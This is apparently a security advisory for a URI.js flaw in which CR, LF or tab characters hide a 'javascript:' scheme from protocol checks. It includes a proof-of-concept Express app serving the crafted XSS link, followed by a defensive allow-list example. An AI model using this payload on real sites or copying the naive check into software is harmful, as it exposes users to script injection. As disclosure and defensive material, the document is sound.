\r, \n and \t characters in a URI can lead to XSS because URI.js fails to extract the javascript: protocol from such a URI. See Section 4.4, Step 3, "Remove all ASCII tab or newline from input", of the WHATWG URL spec.
const URI = require('urijs')
const express = require('express')
const app = express()
const port = 3000
// Crafted input: a CR LF pair inside the scheme, which URI.js does not strip
const input = "ja\r\nvascript:alert(1)"
const url = URI(input)
console.log(url)
app.get('/', (req, res) => {
  // URI.js exposes the scheme via the protocol() accessor, without the trailing colon;
  // for the crafted input it cannot extract a scheme at all, so the check passes
  if (url.protocol() !== "javascript") { res.send(`<a href="${input}">CLICK ME!</a>`) }
})
app.listen(port, () => {
  console.log(`Example app listening on port ${port}`)
})
Run the above and click CLICK ME: applications that use URI.js to check for the javascript: protocol are still vulnerable to XSS.
The vulnerability is incorrect protocol extraction, which can lead to XSS.
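As an added example (not from the advisory or from URI.js itself), the scheme check below mirrors the naive behaviour the report describes beside a check that applies the WHATWG step the report cites, stripping ASCII tab and newline before reading the scheme, and allow-lists schemes rather than looking for javascript: alone. The function names, the allow-list and the sample inputs are assumptions constructed for this illustration; Node's built-in URL class is used only as a cross-check.

```javascript
// Naive extractor: a scheme is only recognised when the text before the first
// ':' is a bare scheme token, so a CR, LF or tab inside it hides the scheme.
const SCHEME_TOKEN = /^[a-z][a-z0-9.+-]*$/i;

function naiveScheme(input) {
  const colon = input.indexOf(':');
  if (colon <= 0) return '';
  const candidate = input.slice(0, colon);
  return SCHEME_TOKEN.test(candidate) ? candidate.toLowerCase() : '';
}

// Spec-aligned extractor: WHATWG URL section 4.4 steps 1-3 strip leading and
// trailing C0 controls/space, then remove every ASCII tab (U+0009), LF (U+000A)
// and CR (U+000D), and only then read the scheme. The crafted input therefore
// collapses to "javascript:alert(1)" before the scheme is examined.
function specScheme(input) {
  const stripped = input
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
  const m = stripped.match(/^([a-z][a-z0-9.+-]*):/i);
  return m ? m[1].toLowerCase() : '';
}

// Defensive link check (assumed allow-list): an href is accepted only when its
// spec-extracted scheme is one we expect, not merely when it is not javascript.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeHref(input) {
  return ALLOWED_SCHEMES.has(specScheme(input));
}

// Cross-check with Node's built-in WHATWG URL parser, which performs the same stripping.
function builtinScheme(input) {
  try { return new URL(input).protocol.replace(/:$/, ''); } catch { return ''; }
}

// Constructed sample inputs: the report's crafted payload, a tab variant, a benign URL.
const SAMPLES = ['ja\r\nvascript:alert(1)', 'java\tscript:alert(1)', 'https://example.org/'];

function compare() {
  return SAMPLES.map((s) => ({
    input: s, naive: naiveScheme(s), spec: specScheme(s), safe: isSafeHref(s),
  }));
}

console.table(compare());
```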